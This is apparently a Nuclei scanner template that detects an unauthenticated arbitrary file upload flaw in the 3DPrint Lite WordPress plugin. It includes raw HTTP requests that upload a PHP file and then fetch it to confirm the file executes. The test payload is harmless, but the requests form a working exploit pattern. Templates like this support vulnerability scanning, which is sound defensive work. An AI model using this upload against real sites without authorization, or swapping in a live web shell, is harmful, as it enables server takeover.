50 lines
2.0 KiB
YAML
50 lines
2.0 KiB
YAML
id: 3dprint-arbitrary-file-upload
|
|
|
|
info:
|
|
name: 3DPrint Lite <1.9.1.5 - Arbitrary File Upload
|
|
author: SecTheBit
|
|
severity: high
|
|
description: |
|
|
3DPrint Lite before 1.9.1.5 contains an arbitrary file upload vulnerability. The p3dlite_handle_upload AJAX action of the plugin does not have any authorization and does not check the uploaded file. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code, As a result, an attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
|
remediation: .htaccess prevents the files from being accessed on Web servers such as Apache.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282
|
|
- https://www.exploit-db.com/exploits/50321
|
|
metadata:
|
|
verified: true
|
|
tags: wpscan,edb,wordpress,wp,wp-plugin,fileupload,intrusive,3dprint
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353
|
|
|
|
-----------------------------54331109111293931601238262353
|
|
Content-Disposition: form-data; name="action"
|
|
|
|
p3dlite_handle_upload
|
|
-----------------------------54331109111293931601238262353
|
|
Content-Disposition: form-data; name="file"; filename={{randstr}}.php
|
|
Content-Type: text/php
|
|
|
|
<?php echo '3DPrint-arbitrary-file-upload'; ?>
|
|
-----------------------------54331109111293931601238262353--
|
|
|
|
- |
|
|
GET /wp-content/uploads/p3d/{{randstr}}.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
req-condition: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(all_headers_2, "text/html")'
|
|
- "status_code_2 == 200"
|
|
- "contains(body_2, '3DPrint-arbitrary-file-upload')"
|
|
condition: and
|
|
|
|
# Enhanced by md on 2022/10/20
|